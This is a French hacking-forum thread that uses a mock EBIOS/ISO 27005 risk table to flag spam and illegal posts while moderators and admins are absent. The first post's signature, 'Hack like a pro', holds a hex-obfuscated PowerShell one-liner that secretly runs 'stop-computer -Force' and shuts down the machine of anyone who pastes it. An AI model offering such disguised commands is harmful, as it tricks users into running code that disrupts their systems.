Annonce

Réduire
Aucune annonce.

Parlons d'analyse de risques (EBIOS / ISO27005)

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Parlons d'analyse de risques (EBIOS / ISO27005)

    Actif Menace Vulnérabilité Risque Impact Probabilité Contre-mesure
    Forum hackademics Post de spams / publicités Indisponnibilité de l'équipe de moderation Conséquences directes ou indirectes sur la qualité des liens sociaux au sein de l'organisme.
    Désertion de la communauté
    Elevé Haute CM1 : Ré-implication de l'équipe de moderation
    CM2 : Désignation de backups pour l'équipe de moderation
    Forum hackademics Post de contenu illégal Indisponnibilité de l'équipe de moderation / administration Conséquences procédurales, pénales, civiles ou administratives, directes ou indirectes. Majeur Haute CM3 : Ré-implication de l'équipe de moderation / administration
    CM4 : Désignation de backups pour l'équipe de moderation / administration
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

  • #2
    Je ne savais pas comment le dire... Voilà une forme tout à fait adaptée à l'environnement ; diplomatique qui plus est.

    Et oui, nous sommes quasiment à un mois sans administrateur (au moins). J'espère qu'il ne leur ait rien arrivé de fâcheux...

    Commentaire


    • #3
      Tu aurais fait un poste marqué, hou hou il y a quelqu'un t'aurait eu le même impact .
      Je crois que c'est le 2ème poste qui parle de l’'absence des admins. Perso, vu le dynamisme du forum c'est pas très grave, de toute façon un forum tu n'apprends rien de concret dessus sauf si les membres partagent et ces dernières années personne ne partage plus rien. Maintenant, on verra les réponses peut-être vous devrez faire un avis de recherche sur le net .

      Commentaire


      • #4
        Apparemment quelqu'un a fait le ménage - quoique incomplet - ce matin ou cette nuit. Il n'y a plus les messages de ce Kevin jenesaisplusquoi.

        DreAmuS : niveau partage, je pense que j'ai un peu donné ces derniers temps.

        Commentaire


        • #5
          Je parle pas de toi en général mais de tous les membres, un site c'est pas un ou deux membres qui font le rôle, c'est un tout, chacun pose sa pierre en partageant les trucs intéressants qui l'a appris. Le soucis c'est que tout le monde prend mais ne donne rien, pour cela j'apprends de mon côté avec d'autres manières qui sont même plus lucratives, je fait des formations en ligne MOOC sur le RE, Réseau, Cyber hacking,... en dehors de mon taff qui me permet d'apprendre plus vite. Même si je ne bosse pas dans la sécurité informatique, je suis toujours intéresser par le code, hacking, web,... et je ne suis pas avare des centaines d'euros mis dedans.

          Commentaire


          • #6
            Bonjour,

            Envoyé par Icarus Voir le message
            Apparemment quelqu'un a fait le ménage
            Effectivement, j'ai fais ce que j'ai pu avec les moyens du bord... Actuellement, mes seuls possibilités sont,
            • Suppression de discussion
            • Suppression de messages
            • Bloquer une discussion
            J'attend toujours d'avoir les droits concernant la suppression des spammeurs... Apparemment droit disparu depuis plusieurs mois, et où on ne trouve pas de solution à l'heure actuelle.

            En attendant, faudra être patient! Combien de temps? Je sais pas...

            Commentaire

            Chargement...
            X